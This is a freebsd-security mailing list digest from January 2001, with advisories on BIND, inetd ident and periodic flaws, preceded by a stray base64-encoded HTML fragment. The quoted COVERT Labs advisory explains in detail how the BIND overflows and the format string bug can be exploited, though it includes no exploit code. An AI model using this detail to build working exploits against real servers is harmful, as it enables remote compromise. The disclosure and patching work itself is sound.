YWxpZ249ImxlZnQiPjxmb250IGNvbG9yPSIjRkYwMDAwIj6lu6+4pmKmrKjssXqquqZewtCr 4aFBpbKxTqhDprizzLdzuOqwVLBluUaxeqq6q0i9Y6FDsXqqurC3sWShQbROrE+n2q3Mqrqw XbRJoUk8L2ZvbnQ+PC9wPg0KICAgICAgPHAgYWxpZ249ImxlZnQiPjxmb250IGNvbG9yPSIj RkYwMDAwIj6hdaZzpN+vfcNhoXalu6+4q0i9Y6rMvdCvZLdOPC9mb250PjwvcD4NCiAgICAg IDxwIGFsaWduPSJsZWZ0Ij48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+pnCqR7F6rE+kz6v+qKmk SKRooUG90L1UqXexeqq6uXG4o6S6s6OsT6W/qqmqurNuxemhQzwvZm9udD48L3A+DQogICAg ICA8cCBhbGlnbj0ibGVmdCI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPqZwqkexeqV1rE+3Ua5p snuxeqq6pVykT6FBoXWmYbJ5rE+26qq6oXY8L2ZvbnQ+PC9wPg0KICAgICAgPHAgYWxpZ249 ImxlZnQiPjxmb250IGNvbG9yPSIjRkYwMDAwIj6mcKpHsXqsT6ZQpuaqurjcoUG0Tr3Qptum 5qtPraunYaFJPC9mb250PjwvcD4NCiAgICA8L2Jsb2NrcXVvdGU+DQogIDwvYmxvY2txdW90 ZT4NCjwvYmxvY2txdW90ZT4NCjwvZm9udD4NCjxwIGFsaWduPSJjZW50ZXIiPqFAPC9wPg0K PHAgYWxpZ249ImNlbnRlciI+PGltZyBib3JkZXI9IjAiIHNyYz0iaHR0cDovL2Z0cC53b3Js ZC5uZXQudHcvfmNvb2xidWcvMDAuanBnIiB3aWR0aD0iNjQwIiBoZWlnaHQ9IjQyMCI+PC9w Pg0KDQo8L2JvZHk+DQoNCjwvaHRtbD4NPEhUTUw+DQo8QSBuYW1lPSINCqhnpEgNClBNIDEx OjQ2OjU4DQoyMDAxLzEvMjkNCjEwMDAwMw0KIj48L2E+DQo8L0hUTUw+DTxIVE1MPg0KPEEg bmFtZT0iDQqoZ6RIDQpQTSAxMTo0NzozMA0KMjAwMS8xLzI5DQoxMDAwMDMNCiI+PC9hPg0K PC9IVE1MPg08SFRNTD4NCjxBIG5hbWU9Ig0KqGekSA0KQU0gMTI6MTg6NTINCjIwMDEvMS8z MA0KMTAwMDAzDQoiPjwvYT4NCjwvSFRNTD4NPEhUTUw+DQo8QSBuYW1lPSINCqhnpEi46rBU s27F6afzt3O46rBUIKW7pri3c7xXpECmyqRUpFGmaKT5oUShRKFEqGekSLjqsFSzbsXpp/O3 c7jqsFQgpbumuLdzvFekQKbKpFQNCkFNIDEyOjIwOjU1DQoyMDAxLzEvMzANCjEwMDAwMw0K Ij48L2E+DQo8L0hUTUw+DTxIVE1MPg0KPEEgbmFtZT0iDQqoZ6RIuOqwVLNuxemn87dzuOqw VCClu6a4t3O8V6RApsqkVKRRpmik+aFEqGekSLjqsFSzbsXpp/MNCkFNIDEyOjIxOjA1DQoy MDAxLzEvMzANCjEwMDAwMw0KIj48L2E+DQo8L0hUTUw+DTxIVE1MPg0KPEEgbmFtZT0iDQqo Z6RIuOqwVLNuxekNCkFNIDEyOjM3OjEzDQoyMDAxLzEvMzANCjEwMDAwMw0KIj48L2E+DQo8 L0hUTUw+DTxIVE1MPg0KPEEgbmFtZT0iDQqoZ6RIuOqwVLNuxemn87dzuOqwVCClu6a4DQpB TSAxMjo1NDo0NA0KMjAwMS8xLzMwDQoxMDAwMDMNCiI+PC9hPg0KPC9IVE1MPg08SFRNTD4N CjxBIG5hbWU9Ig0KqGekSLjqsFSzbsXpp/O3c7jqsFQgpbumuLdzvFekQKbKpFSkUaZopPmh RKFEoUShRA0KQU0gMDE6MDc6MjINCjIwMDEvMS8zMA0KMTAwMDAzDQoiPjwvYT4NCjwvSFRN TD4NPEhUTUw+DQo8QSBuYW1lPSINCqhnpEi46rBUs27F6afzt3O46rBUIKW7pri3c7xXpECm yqRUpFGmaA0KQU0gMDE6MTE6NTgNCjIwMDEvMS8zMA0KMTAwMDAzDQoiPjwvYT4NCjwvSFRN TD4NPEhUTUw+DQo8QSBuYW1lPSINCqhnpEi46rBUs27F6afzt3O46rBUIKW7pri3c7xXpECm yqRUpFGmaKT5oUShRKFEDQpBTSAwMToxNDowNw0KMjAwMS8xLzMwDQoxMDAwMDMNCiI+PC9h Pg0KPC9IVE1MPg08SFRNTD4NCjxBIG5hbWU9Ig0KqGekSLjqsFSzbsXpp/O3c7jqsFQgpbum uLdzvFcNCkFNIDAxOjI2OjI1DQoyMDAxLzEvMzANCjEwMDAwMw0KIj48L2E+DQo8L0hUTUw+ DQo= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 11:48: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 2EC7037B69E; Mon, 29 Jan 2001 11:47:43 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id 8050CBA2AF; Mon, 29 Jan 2001 11:48:09 -0800 (PST) Date: Mon, 29 Jan 2001 11:48:09 -0800 From: Kris Kennaway To: Igor Roshchin Cc: security@freebsd.org, security-officer@freebsd.org Subject: Re: Bind: FreeBSD-SA-01:10 and CERT Advisory CA-2001-02 Message-ID: <20010129114809.A26160@xor.obsecurity.org> References: <200101291629.LAA76025@giganda.komkon.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="gKMricLos+KVdGMg" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200101291629.LAA76025@giganda.komkon.org>; from str@giganda.komkon.org on Mon, Jan 29, 2001 at 11:29:51AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --gKMricLos+KVdGMg Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Jan 29, 2001 at 11:29:51AM -0500, Igor Roshchin wrote: > My COMMENT: > ------- > This is not true, because 4.0-RELEASE was shipped with=20 > named 8.2.2-P5-NOESW Mon Mar 20 20:43:54 GMT 2000 > root@monster.cdrom.com:/usr/obj/usr/src/usr.sbin/named > Thus, the statement in the advisory in question might be > at least misleading. Hmm, oops. I'll update it. > Therefore : > My question: > Is 8.2.2-P5-NOESW (shipped with 4.0-RELEASE) vulnerable to > a) the problem described in FreeBSD-SA-01:10 =20 Sounds like. > b) the problem described in CERT Advisory CA-2001-02=20 > (Multiple Vulnerabilities in BIND), VU#196945 (see that advisory > at the bottom of this message). No, that's a new problem we found out about a few days ago. Ain't software great? An advisory will be forthcoming. Kris --gKMricLos+KVdGMg Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6dcj5Wry0BWjoQKURAoGTAJ0XvIQC9pEtNG/qTMpLjftt9zb1aACfd0hb 2Es7idLJXMkS0cGNrSiLahY= =Ezy/ -----END PGP SIGNATURE----- --gKMricLos+KVdGMg-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 11:57: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from finch-post-10.mail.demon.net (finch-post-10.mail.demon.net [194.217.242.38]) by hub.freebsd.org (Postfix) with ESMTP id 5874C37B400 for ; Mon, 29 Jan 2001 11:56:34 -0800 (PST) Received: from freebsd.demon.co.uk ([194.222.171.207] helo=chemicalterrorism.com) by finch-post-10.mail.demon.net with esmtp (Exim 2.12 #1) id 14NKP9-000M7r-0A for freebsd-security@freebsd.org; Mon, 29 Jan 2001 19:56:11 +0000 Received: from sycho (sycho.chemicalterrorism.com [192.168.0.2]) by chemicalterrorism.com (Postfix) with SMTP id DCBDFF43D for ; Mon, 29 Jan 2001 19:54:47 +0000 (GMT) From: "Si." To: Subject: RE: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? Date: Mon, 29 Jan 2001 19:55:44 -0000 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <01C089BD.2D821D20@w240.z064220178.sjc-ca.dsl.cnc.net> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, Forgive but I do try to keep abreast of the various security lists but this is becoming more and more unmanageable. Could someone more knowledgeable in FreeBSD security tell me whether the four vulnerabilities this article discusses have been fixed by 1) The nice people ISC. 2) The nice people at freebsd-security, i.e. Kris and his team ? Thanks in advance Simon Griffiths. A lonely FreeBSD, MP-RAS, NT, Linux, Win9x, Solaris Admin :-| -----Original Message----- From: Bugtraq List [mailto:BUGTRAQ@SECURITYFOCUS.COM]On Behalf Of COVERT Labs Sent: 29 January 2001 14:32 To: BUGTRAQ@SECURITYFOCUS.COM Subject: [COVERT-2001-01] Multiple Vulnerabilities in BIND -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ______________________________________________________________________ Network Associates, Inc. COVERT Labs Security Advisory January 29, 2001 Vulnerabilities in BIND 4 and 8 COVERT-2001-01 ______________________________________________________________________ o Synopsis BIND 8 contains a buffer overflow that allows a remote attacker to execute arbitrary code. The overflow is in the initial processing of a DNS request and therefore does not require an attacker to control an authoritative DNS server. In addition, the vulnerability is not dependent upon configuration options and affects both recursive and non-recursive servers. This vulnerability has been designated as CVE candidate CAN-2001-10. RISK FACTOR: HIGH BIND 4 contains a buffer overflow that can allow a remote attacker to execute arbitrary code. The overflow occurs when BIND reports an error while attempting to locate IP addresses for name servers. Exploitation of this vulnerability is restricted by the fact that the target name server be recursive and that the attacker has control of an authoritative DNS server. This vulnerability has been designated as CVE candidate CAN-2001-11. RISK FACTOR: MEDIUM BIND 4 contains a format string vulnerability that can allow a remote attacker to execute arbitrary code. This vulnerability also occurs when BIND reports an error while attempting to locate IP addresses for name servers, and thus has the same restrictions on exploitation as the buffer overflow. This vulnerability was fixed several versions prior to the current version of BIND 4, but is still present in certain Unix distributions. This vulnerability has been designated as CVE candidate CAN-2001-13. RISK FACTOR: MEDIUM ______________________________________________________________________ o Vulnerable Systems BIND 8 versions: 8.2, 8.2.1 8.2.2 through to 8.2.2-P7 8.2.3-T1A through to 8.2.3-T9B BIND 4 versions: buffer overflow - 4.9.5 through to 4.9.7 format string - 4.9.3 through to 4.9.5-P1 ______________________________________________________________________ o Vulnerability Overview BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocol distributed by the Internet Software Consortium (www.isc.org). Two versions of BIND distributed by the ISC, BIND version 4 and BIND version 8, are vulnerable to the attacks described in this advisory. The most recent release of BIND, version 9, is not susceptible to these attacks. BIND version 8 contains a buffer overflow in the implementation of Transaction Signatures (TSIG) for DNS security as defined in RFC 2845. Because the overflow occurs within the initial processing of a DNS request, both recursive and non-recursive DNS servers are vulnerable, independent of the DNS security configuration. The mechanisms employed by the DNS server make it susceptible to two potential methods of attack. An attacker can perform a stack based buffer overflow, with two important qualifications: first, that the number of bytes past the end of the buffer that the attacker can overwrite is limited in length, and second, that the values of those bytes are mostly fixed. On the x86 architecture, the attacker can manipulate a sufficient number of bytes such that they can modify the saved frame pointer. Overwriting the least significant byte of the saved frame pointer can result in the execution of arbitrary code in certain predictable installations of the name server. The "infoleak" bug, discovered by Claudio Musmarra, and described in CERT advisory CA-2001-02, permits an attacker to remotely retrieve stack frames from named, which allows for direct calculation of the effect of the one byte overflow. An attacker can also perform a heap overflow, overwriting malloc's internal variables. This method is very effective, though it requires that an operating system's implementation of malloc stores internal data structures in the allocated memory. For this attack to be successful, TCP port 53 must be accessible. BIND version 4 contains a buffer overflow in a section of code that formulates a warning message for a call to syslog. There are several conditions that can lead to the triggering of this overflow, all of which involve the resolution of NS records into IP addresses. This vulnerability is a standard stack overflow, but the information an attacker is able to present is limited to printable characters. This limitation makes susceptibility to exploitation contingent upon the layout of the named process within memory, and possibly upon the amount of memory available to be allocated by the name server. In older versions of BIND 4, the previously mentioned call to syslog utilizes a user controllable string as the second argument, which creates an exploitable condition. The same restriction applies, in that the format string is limited to printable characters. Despite this restriction, a remote attacker is still able to create a malicious format string to exploit the vulnerable syslog function call. ______________________________________________________________________ o Detailed Information The BIND 8 vulnerability is the result of a DNS request utilizing a particular code path that invalidates the logic used to calculate the length of the request buffer. When a request is received, it is either stored in the heap or on the stack, depending on the transport mechanism. Upon receipt of a UDP request, it is read into a 513 byte buffer on the stack called "u.buf" by the function datagram_read(). When a TCP request is received, the message is read by stream_getlen() into a 64k buffer called "sp->s_buf", which is allocated from the heap for every socket. An interesting feature of BIND is that it uses the incoming buffer of both transport mechanisms to read the request from the network and then modifies it to create an appropriate response. Two key variables are maintained to track the usage of the buffer: one containing the actual length of the data in the buffer, called "msglen", and a second variable "buflen" that tracks the remaining length free in the buffer. When a DNS message is received, msglen is initialized to the length of data received from the network. With a UDP message, this is the amount of data returned by a recvfrom() call, whereas with a TCP message, it is the value provided as the length by the client. buflen is set to the size of the buffer used to read the message (512 for UDP, 64k for TCP). Under normal circumstances, as BIND processes a request, it appends the answer, authoritative, and additional records to the query. It then modifies the DNS header to reflect these changes and delivers the response. During this processing, msglen will reflect the length of the response as it is being formed, and buflen will be used to track the remaining space available in the buffer. Throughout the processing, BIND assumes that msglen plus buflen will equal the original length of the buffer. Upon receipt of a DNS message, it is processed as either a request or response based upon the query response flag set in the message header. If a request is received, BIND then determines whether it is a query, iquery, update or notification. Beginning with BIND 8.2, prior to request processing, the additional section of the DNS message is examined for a TSIG resource record. The function ns_find_tsig() is called to perform this functionality as well as to enforce a basic level of validity on the TSIG resource record. If a valid TSIG is identified but an appropriate security key can not be found, an error is signaled and BIND bypasses the normal request processing. As a result, msglen and buflen remain close to their initial values, instead of being set to their "working" values. BIND processes the request as an error since a TSIG was identified but an appropriate security key was not found. As part of the error generation, BIND reuses the request buffer and appends a TSIG after the question section. At this point, BIND assumes that the size of the request is msglen plus buflen which, under normal circumstances, would be correct. However, in this special case, the request was never processed and "msglen + buflen" is in fact almost twice the size of the original buffer. BIND is then willing to append a TSIG via ns_sign() beyond the limits of the buffer. Since a valid security key was not found, ns_sign() will only append a small number of bytes with limited values. As mentioned above, this makes the vulnerable BIND installation susceptible to two types of attack. Combining this oversight with the way a compiler positions the stack variables in datagram_read(), it is possible for an attacker to overwrite portions of the saved stack activation records in datagram_read() with certain fixed values. In this case, executing arbitrary code is possible under the x86 architecture by overwriting the saved frame pointer's least significant byte with zero resulting in the saved frame pointer pointing into the original DNS request in the majority of cases. Predicting the effect of this one byte overflow can be difficult as it varies depending upon how BIND was started. However, the "infoleak" bug allows an attacker to retrieve the stack activation record of datagram_read(). This information can then be used to calculate the exact number of bytes that will displace the frame pointer when the least significant byte of the saved ebp is overwritten with 0. The second method of attack utilizes certain implementations of dynamic memory allocation. It is possible to overwrite malloc's boundary tags with predictable values, changing the standard libraries' notion of the length of the buffer following the buffer processed in the DNS request. Thus, the next set of boundary information is read from within a buffer that an attacker can control, allowing for a malicious pointer overwrite upon compaction. This technique is applicable to malloc implementations that store linkage information in the actual allocated memory. The following implementations are known by COVERT to be exploitable: IRIX libc, Linux glibc, and Solaris libc. The BIND 4 vulnerability is a sprintf into a 999 byte stack buffer that occurs when BIND formulates a message warning the administrator of an inconsistency or error resolving a Name Server record to an IP address. The vulnerability occurs within nslookupComplain(), which is a static utility function used by nslookup(). When BIND encounters a query that it can not answer from its cache or zone files, it attempts to forward the query to a name server that is capable of resolving it or referring BIND to a more appropriate server. When BIND forwards a query, it creates a qinfo structure to keep track of the request. It also creates this structure in order to track requests initiated by itself in order to find various linkage information. BIND can determine potential name servers for which to forward to by walking through each label in the query in its database, looking for stored NS records. The purpose of the nslookup() function is to take a list of NS records and populate a qinfo structure with their corresponding IP addresses. BIND can then use those IP addresses as a list of name servers for which to attempt forwarding or sending a query. nslookup() performs certain sanity checks on the information that it retrieves. For example, if it finds that a particular name server has an IP address of 0.0.0.0, 255.255.255.255, or a multicast address, then it will flag this condition as an error, warn the administrator via syslog, and move on to the next NS record. The function nslookupComplain() is called to warn the administrator and, as mentioned above, contains a stack overflow. In order to trigger this overflow, an attacker needs to get BIND to cache an NS record with a very large length. Furthermore, the attacker needs to cache a record for the resolution of the NS record that contains one of the problem conditions for the logging. This is achievable by sending a query to a recursive name server, asking it to resolve a large name that is under the authority of a malicious name server. The malicious name server then needs to refer the request to another name server also with a large name, and provide an additional record giving an invalid address for that name server. The limitations placed upon the character set allowed in domain names makes the construction of a viable return address difficult. However, there is a potential for an attacker to make the name server return into memory that the attacker has forced the name server to allocate. In this case, vulnerability is contingent upon the location of the heap and the amount of memory available, as well as whether or not the operating system has a policy of lazy swap page allocation as opposed to an eager reservation policy. COVERT has verified that it is possible to exploit named running under Linux by growing the heap to sizes that far exceed that amount of memory and swap available. This was performed by utilizing specific patterns of memory allocation that maximize untouched memory. The situation may be further complicated by the overwriting of two other stack based buffers, nsbuf and abuf, which are read from within the same sprintf that overflows the stack based buffer. This does not come in to play, however, if the value chosen to overwrite the saved return address does not utilize the terminating null byte of the string. It is worth noting that this behavior could make it easier for an attacker to exploit the problem under operating systems that implement sprintf such that overlapping copies are handled correctly. The format string vulnerability in BIND 4 occurs in the syslog call in nslookupComplain(). This vulnerability is in the same section of code as the previously described buffer overflow, and thus can be triggered in a similar fashion by using an authoritative name server under malicious control. This vulnerability was corrected in bind-4.9.5-P1, although certain vendors' named implementations based upon this code remain vulnerable. ______________________________________________________________________ o Resolution ISC has produced patches to address these issues. Except as otherwise noted, BIND version 4.9.8 and 8.2.3 resolve the vulnerabilities described in this advisory. For ISC's description of these problems: http://www.isc.org/products/BIND/bind-security.html To download updated versions of BIND: ftp://ftp.isc.org/isc/bind/src/ In cooperation with COVERT Labs, the CERT/CC is coordinating the collection of information on vulnerable distributions from third party vendors. For the most current vendor information, please read CERT Advisory CA-2001-02 "Multiple Vulnerabilities in BIND" available at: http://www.cert.org/advisories/CA-2001-02.html ______________________________________________________________________ o Credits Discovery and documentation of these vulnerabilities was conducted by Anthony Osborne and John McDonald of the COVERT Labs at PGP Security. ______________________________________________________________________ o Contact Information For more information about the COVERT Labs at PGP Security, visit our website at http://www.pgp.com/covert or send e-mail to covert@nai.com ______________________________________________________________________ o Legal Notice The information contained within this advisory is Copyright (C) 2000 Networks Associates Technology Inc. It may be redistributed provided that no fee is charged for distribution and that the advisory is not modified in any way. Network Associates and PGP are registered Trademarks of Network Associates, Inc. and/or its affiliated companies in the United States and/or other Countries. All other registered and unregistered trademarks in this document are the sole property of their respective owners. ______________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: PGP 7.0.1 iQA+AwUBOnVuH6F4LLqP1YESEQJeAQCdEYWBrcstWvbnJy2LKwETm/SHkqoAmPp6 BCeuRNPzbt9tt3MuJ2W55gk= =xzwT -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 12: 8:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from modemcable101.200-201-24.mtl.mc.videotron.ca (modemcable140.61-201-24.mtl.mc.videotron.ca [24.201.61.140]) by hub.freebsd.org (Postfix) with SMTP id 3A04737B698 for ; Mon, 29 Jan 2001 12:08:10 -0800 (PST) Received: (qmail 24091 invoked from network); 29 Jan 2001 20:08:09 -0000 Received: from cognac.local.mindstep.com (HELO cognac) (192.168.10.9) by jacuzzi.local.mindstep.com with SMTP; 29 Jan 2001 20:08:09 -0000 From: "Patrick Bihan-Faou" To: Cc: Subject: Bash2 removes SSH_CLIENT from the environment Date: Mon, 29 Jan 2001 15:09:30 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I am writing some script that looks for the SSH_CLIENT environment variable. As specified in the sshd(8) man page, this variable should contain the IP address of the client, the port number on the client side and the port number on the server side. However I found that if the login shell of the user is set to bash (version 2.03 or 2.04 at least), this variable is never set. Upon inspection of the code for bash, it appears that bash is explicitely removing the definition of this environment variable. Would anybody have an idea why ??? Also the fix to leave SSH_CLIENT defined is trivial, is that something that would be desirable for the bash2 port ? Patrick. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 12:10:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id D802737B402 for ; Mon, 29 Jan 2001 12:09:50 -0800 (PST) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id VAA12740; Mon, 29 Jan 2001 21:09:00 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Buliwyf McGraw Cc: freebsd-security@FreeBSD.ORG Subject: Re: ecepass - proof of concept code for FreeBSD ipfw bypass (fwd) References: From: Dag-Erling Smorgrav Date: 29 Jan 2001 21:08:59 +0100 In-Reply-To: Buliwyf McGraw's message of "Mon, 29 Jan 2001 11:18:44 -0500 (COT)" Message-ID: Lines: 9 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Buliwyf McGraw writes: > Very interesting... but not really novel, this vulnerability has been known (and patched) for some time now. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 12:35:43 2001 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 6F88237B6A4; Mon, 29 Jan 2001 12:35:14 -0800 (PST) From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory: FreeBSD-SA-01:11.inetd Reply-To: security-advisories@freebsd.org Message-Id: <20010129203514.6F88237B6A4@hub.freebsd.org> Date: Mon, 29 Jan 2001 12:35:14 -0800 (PST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:11 Security Advisory FreeBSD, Inc. Topic: inetd ident server allows remote users to partially read arbitrary wheel-accessible files Category: core Module: inetd Announced: 2001-01-29 Credits: Discovered during internal auditing Affects: FreeBSD 3.x (all releases) FreeBSD 4.x (all releases) Corrected: 2000-11-25 (FreeBSD 4.2-STABLE) 2001-01-26 (FreeBSD 3.5-STABLE) FreeBSD only: Yes I. Background The inetd ident server is an implementation of the RFC1413 identification server which returns the local username of the user connecting to a remote service. II. Problem Description During internal auditing, the internal ident server in inetd was found to incorrectly set group privileges according to the user. Due to ident using root's group permissions, users may read the first 16 (excluding initial whitespace) bytes of wheel-accessible files. All released versions of FreeBSD prior to the correction date including FreeBSD 3.5.1 and FreeBSD 4.2 are vulnerable. III. Impact Users can read the first 16 bytes of wheel-accessible files. To determine which may be potentially read, execute the following command as root: # find / -group wheel \( -perm -40 -a \! -perm +4 \) -ls The inetd internal ident server is not enabled by default. If you have not enabled the ident portion of inetd, you are not vulnerable. IV. Workaround Disable the internal ident server, if enabled: comment out all lines beginning with "auth" in /etc/inetd.conf, then restart inetd by sending it a SIGHUP: # killall -HUP inetd V. Solution One of the following: Upgrade the vulnerable FreeBSD system to 3.5-STABLE or 4.2-STABLE after the correction date. To patch your present system: download the relevant patch from the below location, and execute the following commands as root: [FreeBSD 4.2 base system] # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:11/inetd-4.2.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:11/inetd-4.2.patch.asc Verify the detached PGP signature using your PGP utility. # cd /usr/src/usr.sbin/inetd # patch -p < /path/to/patch # make depend && make all install # killall -HUP inetd [FreeBSD 3.5.1 base system] # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:11/inetd-3.5.1.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:11/inetd-3.5.1.patch.asc Verify the detached PGP signature using your PGP utility. # cd /usr/src/usr.sbin/inetd # patch -p < /path/to/patch # make depend && make all install # killall -HUP inetd -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOnXTplUuHi5z0oilAQFrhQP/QbPbjKwIlhpT50jDhsjKs0NFH7kznkFi SQJ6ZTYOMEGml5CVc9rLUxmSk+FE7hvZAhVu5+Qc+UHniyQnjOVNXaDvICiN6kMz AEs3UQlVK5Hp8QzXikC9Q4wy//yFC+aNhECVW9u0B3k5sAzqitoI7FWexLpcTMFI 1ZWKYOWLo8o= =0Se/ -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 12:44:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id B5FD337B400 for ; Mon, 29 Jan 2001 12:44:20 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id E59FEBA2AF; Mon, 29 Jan 2001 12:44:50 -0800 (PST) Date: Mon, 29 Jan 2001 12:44:50 -0800 From: Kris Kennaway To: "Si." Cc: freebsd-security@FreeBSD.ORG Subject: Re: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? Message-ID: <20010129124450.A26735@xor.obsecurity.org> References: <01C089BD.2D821D20@w240.z064220178.sjc-ca.dsl.cnc.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="+QahgC5+KEYLbs62" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from si@chemicalterrorism.com on Mon, Jan 29, 2001 at 07:55:44PM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --+QahgC5+KEYLbs62 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Mon, Jan 29, 2001 at 07:55:44PM +0000, Si. wrote: > 1) The nice people ISC. > 2) The nice people at freebsd-security, i.e. Kris and his team ? It's fixed in BIND 8.2.3, which is being imported into 4.x and 3.x as we speak (it's already in -current). I had hoped to have it done by the time the advisories were released, but circumstances conspired to prevent it. The timing of our advisory 01:10 last week has potential for confusion, but that does not relate to these recent bugs. We hope to have a new advisory out in a couple of days, but in the meantime everyone is urged to upgrade to 4.2-STABLE or 3.5-STABLE once the upgrades are in, or switch to the bind8 port (also not yet updated). I'll drop another note when the relevant upgrades are in place. Kris --+QahgC5+KEYLbs62 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6ddZCWry0BWjoQKURAhu2AKDfRfXeDsvxBTcRhJnaa8Z3xmfuMACgybs6 HHhOelG4uNoFi+/AgWaiGwQ= =XHif -----END PGP SIGNATURE----- --+QahgC5+KEYLbs62-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 12:51:34 2001 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id B149137B69D; Mon, 29 Jan 2001 12:51:06 -0800 (PST) From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory: FreeBSD-SA-01:12.periodic Reply-To: security-advisories@freebsd.org Message-Id: <20010129205106.B149137B69D@hub.freebsd.org> Date: Mon, 29 Jan 2001 12:51:06 -0800 (PST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:12 Security Advisory FreeBSD, Inc. Topic: periodic uses insecure temporary files Category: core Module: periodic Announced: 2001-01-29 Credits: dynamo Affects: FreeBSD 4.1-STABLE after 2000-09-20, 4.1.1-RELEASE, and 4.1.1-STABLE prior to the correction date. No FreeBSD 3.x versions are affected. Corrected: 2000-11-11 FreeBSD only: Yes I. Background periodic is a program to run periodic system functions. II. Problem Description A vulnerability was inadvertently introduced into periodic that caused temporary files with insecure file names to be used in the system's temporary directory. This may allow a malicious local user to cause arbitrary files on the system to be corrupted. By default, periodic is normally called by cron for daily, weekly, and monthly maintenance. Because these scripts run as root, an attacker may potentially corrupt any file on the system. FreeBSD 4.1-STABLE after 2000-09-20, 4.1.1-RELEASE, and 4.1.1-STABLE prior to the correction date are vulnerable. The problem was corrected prior to the release of FreeBSD 4.2. III. Impact 